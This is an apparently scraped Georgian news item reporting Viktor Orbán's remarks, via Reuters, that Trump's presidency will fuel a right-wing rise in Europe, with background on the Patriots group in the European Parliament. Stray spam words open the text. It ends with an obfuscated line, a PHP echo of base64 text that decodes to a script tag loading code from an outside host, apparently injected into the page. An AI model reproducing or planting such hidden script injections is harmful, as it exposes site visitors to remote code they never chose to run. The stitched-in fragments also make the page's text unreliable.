tube
ავერსი jaluzi

შეერთებულ შტატებში დონალდ ტრამპის პრეზიდენტობა გამოიწვევს მემარჯვენეების ახალ ზრდას ევროპაში. Reuters-ის ცნობით, ამის შესახებ უნგრეთის პრემიერ-მინისტრმა, ვიქტორ ორბანმა განაცხადა.

„მხოლოდ რამდენიმე საათი და მზეც კი სხვანაირად გაანათებს ბრიუსელში. ახალი პრეზიდენტი აშშ-ში, “პატრიოტთა” დიდი ფრაქცია ბრიუსელში, დიდი ენთუზიაზმი. ასე რომ, დიდი თავდასხმა შეიძლება დაიწყოს. ამით ვიწყებ შეტევის მეორე ფაზას, რომლის მიზანია, ბრიუსელის ოკუპაცია“, - განაცხადა ორბანმა

მისი თქმით, ევროკავშირი კრიზისშია, რადგან ვერ უზრუნველყოფს თავისი მოქალაქეების კეთილდღეობას, ვერ აჩერებს არალეგალურ მიგრაციას და ვერ უზრუნველყოფს უსაფრთხოებას.

"ჩვენ უნგრეთში ვართ ბრიუსელში არსებული სისტემის ოპოზიცია. ბრიუსელი ოკუპირებულია მემარცხენე-ლიბერალური ოლიგარქიის მიერ. ევროპის არჩევნებზე ჩვენ მიუახლოვდით ახალი მემარჯვენე უმრავლესობის რეალურ შანსს, რომელსაც შეუძლია შეცვალოს ბრიუსელის ელიტა“, - აღნიშნა ორბანმა.

ორბანის პარტიამ „ფიდესმა“ და სხვა მემარჯვენე პარტიებმა შარშან, ევროპარლამენტში პოლიტიკური ჯგუფი „პატრიოტები“ დააარსეს. ჯგუფი, რომელსაც საფრანგეთის ულტრამემარჯვენე პარტია „ეროვნულმა გაერთიანება“ ხელმძღვანელობს, 86 წევრით სიდიდით მესამე გახდა ევროპარლამენტში.

112
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");